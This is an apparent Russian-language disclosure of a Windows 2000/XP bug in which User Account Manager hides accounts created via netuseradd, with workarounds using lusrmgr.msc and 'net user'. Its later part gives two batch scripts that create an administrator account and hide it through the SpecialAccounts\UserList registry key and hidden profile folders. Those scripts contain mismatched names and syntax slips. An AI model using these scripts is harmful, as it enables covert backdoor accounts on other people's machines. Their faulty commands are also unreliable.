Эта статья описывает неправильную работу
User Account Manager в Панеле Управления Windows. Ошибка
подтверждена в Windows 2000 Professional, Windows XP Home и
Windows XP Professional, компания Microsoft была
уведомлена в конце Июля. Описываемая
проблема не с netapi, а именно с User Account Manager в
операционной системе - программа не может
вывести список всех пользователей,
существующих в системе.
Проблема с пользователями я обнаружил в
процессе исследования netapi в Windows - пользователи,
созданные функцией netuseradd (исходник
на VB.NET) не показываются в User Account Manager и при
логине в систему. Проблема в общем то не
слишком большая, однако большинство
пользователей для обзора всех
пользователей используют Панель
Управления и ожидают от Менеджера
пользователей правильной работы.
Решение этой проблемы опять же довольно
просто - не используйте User Account Manager для
управления пользователями. Вместо него
можно использовать оснастку Local Users and Groups
management, найти ее можно Control Panel -> Administrative Tools
-> Computer Management -> Local Users and Groups, или запустив
lusrmgr.msc. Помимо этого (для тех, у кого нет
такой программы, а это все пользователи XP Home)
реально просмотреть всех пользователей вот
так:
C:\net user
User accounts for \\XPHOMEBITES
| Administrator | ASPNET | Guest |
| HelpAssistant | nabiy | SUPPORT_388945a0 |
The command completed successfully.
Понятно, что сама Windows созадет несколько
учетных записей для своей работы, в
частности , например, Administrator и Guest, HelpAssistant и
т.д.
Удалить "незваного" пользователя
можно так (хотя прежде всего лучше просто
"выключить" пользователя, которого
хотите удалить, через compmgmt.msc, для того, что
бы быть уверенным в том, что это не
критически важный для системы пользователь):
net user ACCOUNTNAME /delete
Еще один способ создать "невидимого"
пользователя в Windows:
net user user password /add && net localgroup
administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "user"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
attrib +r +a +s +h %SystemDrive%\docume~1\user
Exit
Или так (без .reg файла):
net user hiddenuser hidden /add && localgroup
administrators hiddenuser /add
reg add "hklm\software\microsoft\windows
nt\currentversion\winlogon\specialaccounts\userlist /v hiddenuser /t reg_dword /d
0 /f
if exist "\documents and settings\hiddenuser" attrib +s +r +h "\documents
and settings\hiddenuser"
exit
Однако, в данном случае это не уязвимость,
а правильная работа системы - ведь
пользователи из группы Special Accounts не
отображаются при логоне в систему или в
Панели Управления. В первом же случае
налицо неправильное функционирование -
пользователь не входит в группу Special Accounts,
но тем не менее не показывается в списке
юзеров.
